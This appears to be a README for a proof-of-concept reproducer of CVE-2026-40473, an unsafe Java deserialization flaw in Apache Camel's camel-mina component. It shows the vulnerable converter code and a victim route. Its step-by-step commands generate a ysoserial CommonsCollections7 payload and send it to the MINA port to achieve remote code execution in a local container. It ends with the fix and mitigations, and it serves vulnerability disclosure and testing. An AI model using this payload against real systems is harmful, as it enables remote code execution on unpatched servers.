## https://sploitus.com/exploit?id=7E0FD4D1-DF5F-5D83-AFA2-3FC9549BE69E
# camel-mina MinaConverter.toObjectInput Unsafe Deserialization Reproducer (CVE-2026-40473)
This project demonstrates a **Java deserialization vulnerability** in Apache Camel's `camel-mina`
component, tracked as **CVE-2026-40473**. The `MinaConverter.toObjectInput(IoBuffer)` type converter
wraps the received bytes in a raw `ObjectInputStream` with no `ObjectInputFilter`, so a route that
converts a TCP/UDP body to `ObjectInput` and calls `readObject()` can be driven to **remote code
execution** by an attacker sending a crafted serialized object to the MINA port.
Advisory: https://camel.apache.org/security/CVE-2026-40473.html
## Vulnerability Summary
| Property | Value |
|----------|-------|
| **Component** | `camel-mina` |
| **Affected Class** | `org.apache.camel.component.mina.MinaConverter` (`toObjectInput`) |
| **CWE** | CWE-502: Deserialization of Untrusted Data |
| **Impact** | Remote Code Execution (RCE) over TCP/UDP |
| **Affected Versions** | From 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0 |
| **Fixed Versions** | 4.14.6, 4.18.2, 4.20.0 |
| **JIRA** | CAMEL-23319 |
| **Reporter** | Venkatraman Kumar (Securin) |
## Technical Details
The `IoBuffer โ ObjectInput` type converter wraps the buffer in a raw `ObjectInputStream`:
```java
// MinaConverter.toObjectInput(IoBuffer) - affected version
@Converter
public static ObjectInput toObjectInput(IoBuffer buffer) throws IOException {
InputStream is = buffer.asInputStream();
return new ObjectInputStream(is); // NO ObjectInputFilter
}
```
When a camel-mina TCP/UDP consumer delivers the raw bytes (e.g. with `allowDefaultCodec=false`) and the
route asks for `ObjectInput` (`getBody(ObjectInput.class)`, `@Body ObjectInput`, or
`convertBodyTo(ObjectInput.class)`), this converter runs. Calling `readObject()` on the returned stream
then executes any gadget chain in the attacker-supplied bytes.
## The victim route
```java
from("mina:tcp://0.0.0.0:5555?sync=false&allowDefaultCodec=false")
.process(exchange -> {
ObjectInput oi = exchange.getIn().getBody(ObjectInput.class); // MinaConverter.toObjectInput
Object obj = oi.readObject(); // deserialization sink
exchange.getMessage().setBody("deserialized: " + obj);
});
```
## Prerequisites
- Java 17+ and Maven 3.8+ (to build the jar)
- Docker (runs the reproducer)
- ysoserial (for payload generation)
## Reproduction Steps
### Step 1: Build the jar and start the container
```bash
mvn clean package -DskipTests
docker compose up -d --build
```
### Step 2: Generate a malicious payload
```bash
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
# On JDK 21 add --add-opens to generate CommonsCollections gadgets:
java --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections7 "touch /tmp/pwned" | base64 -w0 > payload.b64
```
### Step 3: Send it over TCP to the MINA port (RCE)
```bash
curl -X POST http://localhost:8080/exploit/inject \
-H "Content-Type: text/plain" --data-binary @payload.b64
# The bundled helper opens a raw TCP socket to mina:5555 and writes the bytes; the victim route
# converts them to ObjectInput and calls readObject().
# -> ">>> RCE proof โ /tmp/pwned exists: true"
```
(The MINA port 5555 is internal to the container in this PoC; the `/exploit/inject` helper performs the
raw TCP send from inside. Expose port 5555 to send from the host with a raw client such as `nc`.)
### Step 4: Verify
```bash
docker exec cve-2026-40473 ls -la /tmp/pwned
```
### Cleanup
```bash
docker compose down
```
## Attack Vectors
Any camel-mina TCP or UDP consumer whose route converts the body to `ObjectInput` (directly, via
`@Body ObjectInput`, or `convertBodyTo(ObjectInput.class)`) is exploitable by anyone who can reach the
MINA port.
## Exploit Conditions
1. A camel-mina TCP/UDP consumer that requests `ObjectInput` conversion of the received bytes.
2. **A gadget library on the classpath** (e.g. `commons-collections:3.2.1`).
## Recommended Fix
Upgrade to 4.14.6 / 4.18.2 / 4.20.0. The fix applies an `ObjectInputFilter` / class allow-list to the
converter (matching the hardening applied to camel-netty, camel-jms and camel-infinispan).
## Mitigation
Until upgrading:
1. **Do not convert untrusted MINA bodies to `ObjectInput`** / do not deserialize them.
2. **Remove gadget libraries** (upgrade/remove commons-collections 3.x).
3. Restrict network access to the MINA port to trusted peers.
## Files
```
CVE-2026-40473/
โโโ pom.xml
โโโ Dockerfile
โโโ docker-compose.yml
โโโ README.md
โโโ src/main/
โโโ java/com/example/
โ โโโ Application.java
โ โโโ MinaObjectRoute.java # victim: from(mina:tcp).getBody(ObjectInput).readObject()
โ โโโ ExploitController.java # /inject: sends serialized bytes over TCP to mina:5555
โโโ resources/
โโโ application.properties
```
## Disclaimer
This reproducer is provided for **security research and authorized testing only**, for a **publicly
disclosed and fixed** vulnerability. Do not use it against systems without explicit permission.